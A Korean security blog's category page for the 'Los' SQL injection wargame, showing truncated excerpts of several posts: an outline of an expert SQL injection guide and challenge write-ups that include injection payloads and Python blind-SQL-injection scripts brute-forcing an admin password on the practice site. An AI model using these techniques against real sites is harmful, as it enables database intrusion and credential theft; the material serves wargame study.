일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 |
- 파이썬
- HTML
- UKPT
- 불법유통
- codeup
- 도구모음
- 여행
- 불법유통근절
- 국가정보원
- 연구모임
- Service
- MITRE ATT&CK
- PHP
- suninatas
- 국정원
- 웹 해킹 입문
- 화학물질안전원
- 화학물질
- webhacking
- 프로젝트
- 기타정보
- nurisec
- UKPT level
- 경기팀
- Los
- 12기
- 대외활동
- 국가기록원
- 정보보안
- 화학물질불법유통온라인감시단
- Today
- Total
목록Los (4)
agencies

SQL Injection for Expert 목차 * 이 문서는 어떻게 작성되었는가? * SQL Injection Filter Bypass * , Array 변수를 사용한 SQL Injection * Error Based SQL Injection * Error Based Blind SQL Injection * Indirect SQL Injection * Efficient Blind SQL Injection * SQL Injection with information schema.processlist [*] 이 문서는 어떻게 작성되었는가? LeaveRet 소속의 rubiya 가 심화된 SQL injection 기법을 익히기를 희망하는 해커, 개발자들을 위해서 작성했다. 이 문서는 PHP, Mysql 환경에서..

지금까지 보았던 pw = 형식과 다르게 like를 사용하는 모습을 볼 수 있었습니다. 검색을 해보니... like를 통해 와일드카드를 사용할 수 있다고 합니다. 이를 통해 패스워드의 길이와 값을 알아낼 수 있다고 합니다. _를 8번 입력하니 Hello guest가 나타났습니다. 앞에 9를 입력하고 나머지는 글자수만큼 _로 채워줬습니다. 패스워드가 8자리만 나타나야하는데 계속 파이썬 스크립트 코드가 돌아가는 모습을 볼 수 있었습니다. * flag 변수 한개만 있었네요.. 스크립트의 잘못된 부분을 찾아보기 위해 하나씩 대입하던 중 902_____를 입력했더니 문제를 풀었다고 합니다. guest는 패스워드가 나타났으나... admin 같은 경우 아래의 사진처럼 guest의 패스워드가 중복이 되어 패스워드가 나..

LOS의 문제 내용입니다. darkknight 이며, 문제풀이 내용은 아래와 같습니다. import requests as r url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=1%20or%20id%20like%20reverse(%22nimda%22)%20and%20" i=8 flag = "" #패스워드 검사 for j in range(1,i+1): for k in range(ord('0'), ord('z')): p = "ord(mid(pw,{0},1))like {1}%23".format(j,k) res = r.get(url+p,cookies={"PHPSESSID":"vgjb9eaaankiq042bvju..

이번에는 or과 and만 주의해서 문제를 풀면 될 것 같습니다. 패스워드의 길이는 8정도로 예상하고 값을 입력합니다. pw='||id='admin'%26%26length(pw)=8%23 %26은 &을 나타냅니다. 따라서 &&은 and 연산과 동일합니다. ||은 or과 동일합니다. %23은 #으로 sql에서는 뒷 부분이 모두 주석처리되는 기능을 가지고 있습니다. 이제 패스워드의 길이를 구했으니, 값을 구할 차례입니다. import requests as r url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27||id=%27admin%27%26%26" i=8 flag = "" #패스워드 검사 for j in ran..